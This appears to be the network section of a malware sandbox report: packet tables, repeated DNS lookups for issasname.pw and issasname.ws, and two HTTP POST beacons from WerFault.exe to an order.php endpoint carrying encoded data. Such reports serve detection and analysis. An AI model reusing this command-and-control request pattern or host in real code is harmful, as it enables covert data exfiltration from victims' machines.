                      Dec 5, 2022 12:47:53.551372051 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.551389933 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.722326994 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.722367048 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.722429037 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.762636900 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.752098083 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.752161026 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.923017025 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.923067093 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.923168898 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.962780952 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:55.956294060 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:55.956346035 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:56.127218962 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:56.127250910 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:56.127398968 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:56.166471958 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:58.127944946 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:58.128380060 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.308618069 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.309379101 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.479604006 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.480115891 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.480407953 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.480753899 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.480783939 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.651473045 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.651508093 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.688416004 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.689490080 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.735136032 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.735136032 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.906112909 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:00.906209946 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.945637941 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:01.952442884 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:01.953716993 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:02.123275995 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:02.123313904 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:02.123529911 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:02.164690971 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:04.125025988 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:04.125128031 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.286149025 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.286566973 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.457190990 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.457443953 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.457595110 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.503144026 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.503209114 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.674568892 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.674633980 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.674829960 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.713804960 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:07.674763918 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:07.675301075 CET4970480192.168.2.564.70.19.203

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 5, 2022 12:46:19.368386984 CET5821853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:19.388096094 CET53582188.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:21.586869955 CET6099853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:21.606560946 CET53609988.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:47.927086115 CET5695353192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:47.948565960 CET53569538.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:51.682096004 CET5864853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:51.860229015 CET53586488.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:58.081708908 CET5689453192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:58.104207993 CET53568948.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:00.505069017 CET5029553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:00.527439117 CET53502958.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:01.537971973 CET6084153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:01.558377981 CET53608418.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:02.932140112 CET6189353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:02.949665070 CET53618938.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:04.160000086 CET6064953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:04.205295086 CET53606498.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:08.104903936 CET5144153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:08.131750107 CET53514418.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:09.177295923 CET4917753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:09.196525097 CET53491778.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:11.113308907 CET4972453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:11.133984089 CET53497248.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:12.422530890 CET6145253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:12.440295935 CET53614528.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:14.828602076 CET6532353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:14.849047899 CET53653238.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:15.867122889 CET5148453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:15.893258095 CET53514848.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:17.255496979 CET6344653192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:17.275229931 CET53634468.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:18.479582071 CET5675153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:18.500483036 CET53567518.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:20.714375019 CET5503953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:20.733977079 CET53550398.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:21.740885973 CET6097553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:21.760761976 CET53609758.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:23.130640030 CET5922053192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:23.149879932 CET53592208.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:24.351722002 CET5506853192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:24.369570017 CET53550688.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:26.631484032 CET5668253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:26.653245926 CET53566828.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:27.665007114 CET5853253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:27.682667971 CET53585328.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:29.244020939 CET6265953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:29.261298895 CET53626598.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:30.882400036 CET5858153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:30.911650896 CET53585818.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:33.137125015 CET5626353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:33.163158894 CET53562638.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:34.200351000 CET6551353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:34.245270014 CET53655138.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:36.008358955 CET5668753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:36.027875900 CET53566878.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:37.664024115 CET6441953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:37.681339025 CET53644198.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:39.883457899 CET5268853192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:39.902812004 CET53526888.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:40.915661097 CET6134453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:40.935453892 CET53613448.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:42.290935993 CET5397253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:42.309464931 CET53539728.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:43.523839951 CET6493253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:43.544738054 CET53649328.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:45.766359091 CET5847253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:45.783976078 CET53584728.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:46.882335901 CET6017753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:46.901873112 CET53601778.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:48.646536112 CET6028453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:48.676736116 CET53602848.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:50.104298115 CET6001953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:50.123997927 CET53600198.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:52.321288109 CET5090253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:52.340924025 CET53509028.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:53.355410099 CET5382353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:53.374838114 CET53538238.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:54.727550030 CET4976953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:54.747028112 CET53497698.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:55.932002068 CET4957953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:55.951236963 CET53495798.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:58.149919987 CET5355553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:58.166851997 CET53535558.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:59.283850908 CET6129353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:59.301642895 CET53612938.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:00.708043098 CET5008653192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:00.725605965 CET53500868.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:01.921839952 CET5218853192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:01.941637039 CET53521888.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:04.170104027 CET5458553192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:04.191605091 CET53545858.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:05.225991964 CET5210053192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:05.243825912 CET53521008.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:07.129353046 CET6090853192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:07.149082899 CET53609088.8.8.8192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Dec 5, 2022 12:46:19.368386984 CET192.168.2.58.8.8.80xf518Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:21.586869955 CET192.168.2.58.8.8.80xf49fStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:47.927086115 CET192.168.2.58.8.8.80x1254Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:51.682096004 CET192.168.2.58.8.8.80xa46bStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:58.081708908 CET192.168.2.58.8.8.80x38fdStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:00.505069017 CET192.168.2.58.8.8.80x79d8Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:01.537971973 CET192.168.2.58.8.8.80xc01bStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:02.932140112 CET192.168.2.58.8.8.80xd7ebStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:04.160000086 CET192.168.2.58.8.8.80xfe12Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:08.104903936 CET192.168.2.58.8.8.80xefe6Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:09.177295923 CET192.168.2.58.8.8.80x826aStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:11.113308907 CET192.168.2.58.8.8.80xdc14Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:12.422530890 CET192.168.2.58.8.8.80x806eStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:14.828602076 CET192.168.2.58.8.8.80x32cStandard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:15.867122889 CET192.168.2.58.8.8.80xe9b2Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:17.255496979 CET192.168.2.58.8.8.80xcc3dStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:18.479582071 CET192.168.2.58.8.8.80x451aStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:20.714375019 CET192.168.2.58.8.8.80xe994Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:21.740885973 CET192.168.2.58.8.8.80xcd36Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:23.130640030 CET192.168.2.58.8.8.80x878fStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:24.351722002 CET192.168.2.58.8.8.80x57bfStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:26.631484032 CET192.168.2.58.8.8.80x9839Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:27.665007114 CET192.168.2.58.8.8.80x93e8Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:29.244020939 CET192.168.2.58.8.8.80xd183Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:30.882400036 CET192.168.2.58.8.8.80xebe7Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:33.137125015 CET192.168.2.58.8.8.80x1bb1Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:34.200351000 CET192.168.2.58.8.8.80x45f2Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:36.008358955 CET192.168.2.58.8.8.80xb077Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:37.664024115 CET192.168.2.58.8.8.80x4c0Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:39.883457899 CET192.168.2.58.8.8.80x4cb1Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:40.915661097 CET192.168.2.58.8.8.80x4ddeStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:42.290935993 CET192.168.2.58.8.8.80x105bStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:43.523839951 CET192.168.2.58.8.8.80x3e7eStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:45.766359091 CET192.168.2.58.8.8.80x212eStandard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:46.882335901 CET192.168.2.58.8.8.80x76cfStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:48.646536112 CET192.168.2.58.8.8.80xcce4Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:50.104298115 CET192.168.2.58.8.8.80xa72fStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:52.321288109 CET192.168.2.58.8.8.80xf99aStandard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:53.355410099 CET192.168.2.58.8.8.80x4136Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:54.727550030 CET192.168.2.58.8.8.80xd969Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:55.932002068 CET192.168.2.58.8.8.80xef0fStandard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:58.149919987 CET192.168.2.58.8.8.80xa864Standard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:59.283850908 CET192.168.2.58.8.8.80x4f31Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:00.708043098 CET192.168.2.58.8.8.80xbe02Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:01.921839952 CET192.168.2.58.8.8.80xde41Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:04.170104027 CET192.168.2.58.8.8.80x62aeStandard query (0)issasname.pwA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:05.225991964 CET192.168.2.58.8.8.80xf207Standard query (0)issasname.wsA (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:07.129353046 CET192.168.2.58.8.8.80xbba3Standard query (0)issasname.wsA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Dec 5, 2022 12:46:21.606560946 CET8.8.8.8192.168.2.50xf49fNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:47.948565960 CET8.8.8.8192.168.2.50x1254No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:51.860229015 CET8.8.8.8192.168.2.50xa46bNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:46:58.104207993 CET8.8.8.8192.168.2.50x38fdNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:01.558377981 CET8.8.8.8192.168.2.50xc01bNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:02.949665070 CET8.8.8.8192.168.2.50xd7ebNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:04.205295086 CET8.8.8.8192.168.2.50xfe12No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:09.196525097 CET8.8.8.8192.168.2.50x826aNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:11.133984089 CET8.8.8.8192.168.2.50xdc14No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:12.440295935 CET8.8.8.8192.168.2.50x806eNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:15.893258095 CET8.8.8.8192.168.2.50xe9b2No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:17.275229931 CET8.8.8.8192.168.2.50xcc3dNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:18.500483036 CET8.8.8.8192.168.2.50x451aNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:21.760761976 CET8.8.8.8192.168.2.50xcd36No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:23.149879932 CET8.8.8.8192.168.2.50x878fNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:24.369570017 CET8.8.8.8192.168.2.50x57bfNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:27.682667971 CET8.8.8.8192.168.2.50x93e8No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:29.261298895 CET8.8.8.8192.168.2.50xd183No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:30.911650896 CET8.8.8.8192.168.2.50xebe7No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:34.245270014 CET8.8.8.8192.168.2.50x45f2No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:36.027875900 CET8.8.8.8192.168.2.50xb077No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:37.681339025 CET8.8.8.8192.168.2.50x4c0No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:40.935453892 CET8.8.8.8192.168.2.50x4ddeNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:42.309464931 CET8.8.8.8192.168.2.50x105bNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:43.544738054 CET8.8.8.8192.168.2.50x3e7eNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:46.901873112 CET8.8.8.8192.168.2.50x76cfNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:48.676736116 CET8.8.8.8192.168.2.50xcce4No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:50.123997927 CET8.8.8.8192.168.2.50xa72fNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:53.374838114 CET8.8.8.8192.168.2.50x4136No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:54.747028112 CET8.8.8.8192.168.2.50xd969No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:55.951236963 CET8.8.8.8192.168.2.50xef0fNo error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:47:59.301642895 CET8.8.8.8192.168.2.50x4f31No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:00.725605965 CET8.8.8.8192.168.2.50xbe02No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:01.941637039 CET8.8.8.8192.168.2.50xde41No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:05.243825912 CET8.8.8.8192.168.2.50xf207No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false
                      Dec 5, 2022 12:48:07.149082899 CET8.8.8.8192.168.2.50xbba3No error (0)issasname.ws64.70.19.203A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • issasname.ws

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.54969064.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:46:49.744932890 CET94OUTPOST /xyz/abc/order.php?id=9504479 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:49.745218039 CET95OUTData Raw: 6d 65 77 6f 67 79 71 69 3d 36 31 37 36 39 34 34 36 26 6f 69 63 77 3d 31 63 66 30 33 30 63 34 32 64 36 37 31 30 34 39 34 37 36 30 35 32 33 38 33 37 64 34 62 33 33 31 34 35 65 62 61 62 38 39 64 61 38 31 37 32 32 32 66 36 64 64 35 66 39 35 65 33 30
                      Data Ascii: mewogyqi=61769446&oicw=1cf030c42d6710494760523837d4b33145ebab89da817222f6dd5f95e305&qmieaw=0BA9B4B7380861F71B81684334F4A10335B3EEEF8683DE04CD76CCFAF458B46452D61F32DCE6F23E5B4FC9293FC4691CC5BDB36D5AE6E997855EEEAAF4FF7BA7B7851768289D2D30B7C5C88A
                      Dec 5, 2022 12:46:49.917643070 CET96INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:49 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.54969264.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:46:55.095514059 CET107OUTPOST /xyz/abc/order.php?page=70 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:55.095606089 CET108OUTData Raw: 61 61 67 67 3d 31 38 36 31 34 34 31 38 26 63 65 6d 6f 77 79 3d 38 32 38 61 66 34 36 36 35 62 36 36 63 34 36 38 33 66 31 63 32 66 38 31 32 65 36 39 33 61 66 31 34 35 63 62 26 65 69 73 77 67 6b 6f 79 3d 37 32 35 45 42 42 31 39 33 39 35 37 38 36 44
                      Data Ascii: aagg=18614418&cemowy=828af4665b66c4683f1c2f812e693af145cb&eiswgkoy=725EBB19395786DDC249E09DFF6F66A182EAA9334A6A475371E89AF5FD6427E3A228C47A48428264CD45D0197C7193A1964CFB01EDAB5617F64F9ED420506441F6BC3A33EC2D758F489F3B11453CA6B2CFDF7AA495CD4EE1
                      Dec 5, 2022 12:46:55.266063929 CET109INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:55 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


